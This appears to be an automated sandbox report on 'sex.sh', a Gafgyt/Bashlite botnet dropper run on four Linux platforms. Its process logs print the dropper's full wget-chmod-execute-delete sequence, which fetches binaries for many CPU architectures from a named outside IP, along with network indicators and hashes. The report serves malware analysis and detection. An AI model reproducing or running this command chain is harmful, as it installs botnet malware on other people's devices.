Malware Analysis Report

2025-08-10 14:00

Sample ID 240804-qxyt6awfjn
Target sex.sh
SHA256 bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276
Tags
gafgyt botnet
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276

Threat Level: Known bad

The file sex.sh was found to be: Known bad.

Malicious Activity Summary

gafgyt botnet

Detected Gafgyt variant

Gafgyt/Bashlite

Executes dropped EXE

Changes its process name

Writes file to tmp directory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-08-04 13:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-04 13:39

Reported

2024-08-04 13:41

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

4s

Max time network

131s

Command Line

[/tmp/sex.sh]

Signatures

Detected Gafgyt variant

Description  Indicator  Process  Target
N/A          N/A        N/A      N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description  Indicator   Process     Target
N/A          /tmp/arm61  /tmp/arm61  N/A

Writes file to tmp directory

Description                   Indicator   Process        Target
File opened for modification  /tmp/arm61  /usr/bin/wget  N/A

Processes

/tmp/sex.sh

[/tmp/sex.sh]

/usr/bin/wget

[wget http://216.172.177.16/mips]

/bin/chmod

[chmod +x mips]

/tmp/mips

[./mips]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://216.172.177.16/mipsel]

/bin/chmod

[chmod +x mipsel]

/tmp/mipsel

[./mipsel]

/bin/rm

[rm -rf mipsel]

/usr/bin/wget

[wget http://216.172.177.16/sh4]

/bin/chmod

[chmod +x sh4]

/tmp/sh4

[./sh4]

/bin/rm

[rm -rf sh4]

/usr/bin/wget

[wget http://216.172.177.16/x86]

/bin/chmod

[chmod +x x86]

/tmp/x86

[./x86]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://216.172.177.16/arm61]

/bin/chmod

[chmod +x arm61]

/tmp/arm61

[./arm61]

/bin/rm

[rm -rf arm61]

/usr/bin/wget

[wget http://216.172.177.16/i686]

/bin/chmod

[chmod +x i686]

/tmp/i686

[./i686]

/bin/rm

[rm -rf i686]

/usr/bin/wget

[wget http://216.172.177.16/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://216.172.177.16/586]

/bin/chmod

[chmod +x 586]

/tmp/586

[./586]

/bin/rm

[rm -rf 586]

/usr/bin/wget

[wget http://216.172.177.16/m68k]

/bin/chmod

[chmod +x m68k]

/tmp/m68k

[./m68k]

/bin/rm

[rm -rf m68k]

/usr/bin/wget

[wget http://216.172.177.16/dc]

/bin/chmod

[chmod +x dc]

/tmp/dc

[./dc]

/bin/rm

[rm -rf dc]

/usr/bin/wget

[wget http://216.172.177.16/dss]

/bin/chmod

[chmod +x dss]

/tmp/dss

[./dss]

/bin/rm

[rm -rf dss]

/usr/bin/wget

[wget http://216.172.177.16/co]

/bin/chmod

[chmod +x co]

/tmp/co

[./co]

/bin/rm

[rm -rf co]

/usr/bin/wget

[wget http://216.172.177.16/scar]

/bin/chmod

[chmod +x scar]

/tmp/scar

[./scar]

/bin/rm

[rm -rf scar]

Network

Country  Destination         Domain          Proto
N/A      224.0.0.251:5353    N/A             udp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
GB       185.125.188.62:443  N/A             tcp
GB       185.125.188.61:443  N/A             tcp
US       151.101.193.91:443  N/A             tcp
US       151.101.193.91:443  N/A             tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
GB       89.187.167.4:443    N/A             tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp

Files

/tmp/arm61

MD5 6820e48a7c8f9b287da8f0593b0a8f83
SHA1 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
SHA256 eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
SHA512 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-04 13:39

Reported

2024-08-04 13:42

Platform

debian9-armhf-20240611-en

Max time kernel

145s

Max time network

172s

Command Line

[/tmp/sex.sh]

Signatures

Detected Gafgyt variant

Description  Indicator  Process  Target
N/A          N/A        N/A      N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description  Indicator   Process     Target
N/A          /tmp/arm61  /tmp/arm61  N/A

Changes its process name

Description                                                      Indicator  Process     Target
Changes the process name, possibly in an attempt to hide itself  N/A        /tmp/arm61  N/A

Writes file to tmp directory

Description                   Indicator   Process        Target
File opened for modification  /tmp/arm61  /usr/bin/wget  N/A

Processes

/tmp/sex.sh

[/tmp/sex.sh]

/usr/bin/wget

[wget http://216.172.177.16/mips]

/bin/chmod

[chmod +x mips]

/tmp/mips

[./mips]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://216.172.177.16/mipsel]

/bin/chmod

[chmod +x mipsel]

/tmp/mipsel

[./mipsel]

/bin/rm

[rm -rf mipsel]

/usr/bin/wget

[wget http://216.172.177.16/sh4]

/bin/chmod

[chmod +x sh4]

/tmp/sh4

[./sh4]

/bin/rm

[rm -rf sh4]

/usr/bin/wget

[wget http://216.172.177.16/x86]

/bin/chmod

[chmod +x x86]

/tmp/x86

[./x86]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://216.172.177.16/arm61]

/bin/chmod

[chmod +x arm61]

/tmp/arm61

[./arm61]

/bin/rm

[rm -rf arm61]

/usr/bin/wget

[wget http://216.172.177.16/i686]

/bin/chmod

[chmod +x i686]

/tmp/i686

[./i686]

/bin/rm

[rm -rf i686]

/usr/bin/wget

[wget http://216.172.177.16/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://216.172.177.16/586]

/bin/chmod

[chmod +x 586]

/tmp/586

[./586]

/bin/rm

[rm -rf 586]

/usr/bin/wget

[wget http://216.172.177.16/m68k]

/bin/chmod

[chmod +x m68k]

/tmp/m68k

[./m68k]

/bin/rm

[rm -rf m68k]

/usr/bin/wget

[wget http://216.172.177.16/dc]

/bin/chmod

[chmod +x dc]

/tmp/dc

[./dc]

/bin/rm

[rm -rf dc]

/usr/bin/wget

[wget http://216.172.177.16/dss]

/bin/chmod

[chmod +x dss]

/tmp/dss

[./dss]

/bin/rm

[rm -rf dss]

/usr/bin/wget

[wget http://216.172.177.16/co]

/bin/chmod

[chmod +x co]

/tmp/co

[./co]

/bin/rm

[rm -rf co]

/usr/bin/wget

[wget http://216.172.177.16/scar]

/bin/chmod

[chmod +x scar]

/tmp/scar

[./scar]

/bin/rm

[rm -rf scar]

Network

Country  Destination         Domain          Proto
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       5.252.177.70:23     N/A             tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp
US       5.252.177.70:23     N/A             tcp

Files

/tmp/arm61

MD5 6820e48a7c8f9b287da8f0593b0a8f83
SHA1 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
SHA256 eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
SHA512 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c

memory/747-1-0xb66ba000-0xb66cb044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-04 13:39

Reported

2024-08-04 13:41

Platform

debian9-mipsbe-20240611-en

Max time kernel

13s

Max time network

15s

Command Line

[/tmp/sex.sh]

Signatures

Detected Gafgyt variant

Description  Indicator  Process  Target
N/A          N/A        N/A      N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description  Indicator   Process     Target
N/A          /tmp/arm61  /tmp/arm61  N/A

Writes file to tmp directory

Description                   Indicator   Process        Target
File opened for modification  /tmp/arm61  /usr/bin/wget  N/A

Processes

/tmp/sex.sh

[/tmp/sex.sh]

/usr/bin/wget

[wget http://216.172.177.16/mips]

/bin/chmod

[chmod +x mips]

/tmp/mips

[./mips]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://216.172.177.16/mipsel]

/bin/chmod

[chmod +x mipsel]

/tmp/mipsel

[./mipsel]

/bin/rm

[rm -rf mipsel]

/usr/bin/wget

[wget http://216.172.177.16/sh4]

/bin/chmod

[chmod +x sh4]

/tmp/sh4

[./sh4]

/bin/rm

[rm -rf sh4]

/usr/bin/wget

[wget http://216.172.177.16/x86]

/bin/chmod

[chmod +x x86]

/tmp/x86

[./x86]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://216.172.177.16/arm61]

/bin/chmod

[chmod +x arm61]

/tmp/arm61

[./arm61]

/bin/rm

[rm -rf arm61]

/usr/bin/wget

[wget http://216.172.177.16/i686]

/bin/chmod

[chmod +x i686]

/tmp/i686

[./i686]

/bin/rm

[rm -rf i686]

/usr/bin/wget

[wget http://216.172.177.16/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://216.172.177.16/586]

/bin/chmod

[chmod +x 586]

/tmp/586

[./586]

/bin/rm

[rm -rf 586]

/usr/bin/wget

[wget http://216.172.177.16/m68k]

/bin/chmod

[chmod +x m68k]

/tmp/m68k

[./m68k]

/bin/rm

[rm -rf m68k]

/usr/bin/wget

[wget http://216.172.177.16/dc]

/bin/chmod

[chmod +x dc]

/tmp/dc

[./dc]

/bin/rm

[rm -rf dc]

/usr/bin/wget

[wget http://216.172.177.16/dss]

/bin/chmod

[chmod +x dss]

/tmp/dss

[./dss]

/bin/rm

[rm -rf dss]

/usr/bin/wget

[wget http://216.172.177.16/co]

/bin/chmod

[chmod +x co]

/tmp/co

[./co]

/bin/rm

[rm -rf co]

/usr/bin/wget

[wget http://216.172.177.16/scar]

/bin/chmod

[chmod +x scar]

/tmp/scar

[./scar]

/bin/rm

[rm -rf scar]

Network

Country  Destination         Domain          Proto
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp

Files

/tmp/arm61

MD5 6820e48a7c8f9b287da8f0593b0a8f83
SHA1 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
SHA256 eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
SHA512 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-04 13:39

Reported

2024-08-04 13:41

Platform

debian9-mipsel-20240418-en

Max time kernel

13s

Max time network

15s

Command Line

[/tmp/sex.sh]

Signatures

Detected Gafgyt variant

Description  Indicator  Process  Target
N/A          N/A        N/A      N/A

Gafgyt/Bashlite

botnet gafgyt

Executes dropped EXE

Description  Indicator   Process     Target
N/A          /tmp/arm61  /tmp/arm61  N/A

Writes file to tmp directory

Description                   Indicator   Process        Target
File opened for modification  /tmp/arm61  /usr/bin/wget  N/A

Processes

/tmp/sex.sh

[/tmp/sex.sh]

/usr/bin/wget

[wget http://216.172.177.16/mips]

/bin/chmod

[chmod +x mips]

/tmp/mips

[./mips]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://216.172.177.16/mipsel]

/bin/chmod

[chmod +x mipsel]

/tmp/mipsel

[./mipsel]

/bin/rm

[rm -rf mipsel]

/usr/bin/wget

[wget http://216.172.177.16/sh4]

/bin/chmod

[chmod +x sh4]

/tmp/sh4

[./sh4]

/bin/rm

[rm -rf sh4]

/usr/bin/wget

[wget http://216.172.177.16/x86]

/bin/chmod

[chmod +x x86]

/tmp/x86

[./x86]

/bin/rm

[rm -rf x86]

/usr/bin/wget

[wget http://216.172.177.16/arm61]

/bin/chmod

[chmod +x arm61]

/tmp/arm61

[./arm61]

/bin/rm

[rm -rf arm61]

/usr/bin/wget

[wget http://216.172.177.16/i686]

/bin/chmod

[chmod +x i686]

/tmp/i686

[./i686]

/bin/rm

[rm -rf i686]

/usr/bin/wget

[wget http://216.172.177.16/ppc]

/bin/chmod

[chmod +x ppc]

/tmp/ppc

[./ppc]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://216.172.177.16/586]

/bin/chmod

[chmod +x 586]

/tmp/586

[./586]

/bin/rm

[rm -rf 586]

/usr/bin/wget

[wget http://216.172.177.16/m68k]

/bin/chmod

[chmod +x m68k]

/tmp/m68k

[./m68k]

/bin/rm

[rm -rf m68k]

/usr/bin/wget

[wget http://216.172.177.16/dc]

/bin/chmod

[chmod +x dc]

/tmp/dc

[./dc]

/bin/rm

[rm -rf dc]

/usr/bin/wget

[wget http://216.172.177.16/dss]

/bin/chmod

[chmod +x dss]

/tmp/dss

[./dss]

/bin/rm

[rm -rf dss]

/usr/bin/wget

[wget http://216.172.177.16/co]

/bin/chmod

[chmod +x co]

/tmp/co

[./co]

/bin/rm

[rm -rf co]

/usr/bin/wget

[wget http://216.172.177.16/scar]

/bin/chmod

[chmod +x scar]

/tmp/scar

[./scar]

/bin/rm

[rm -rf scar]

Network

Country  Destination         Domain          Proto
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp
US       216.172.177.16:80   216.172.177.16  tcp

Files

/tmp/arm61

MD5 6820e48a7c8f9b287da8f0593b0a8f83
SHA1 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
SHA256 eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
SHA512 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c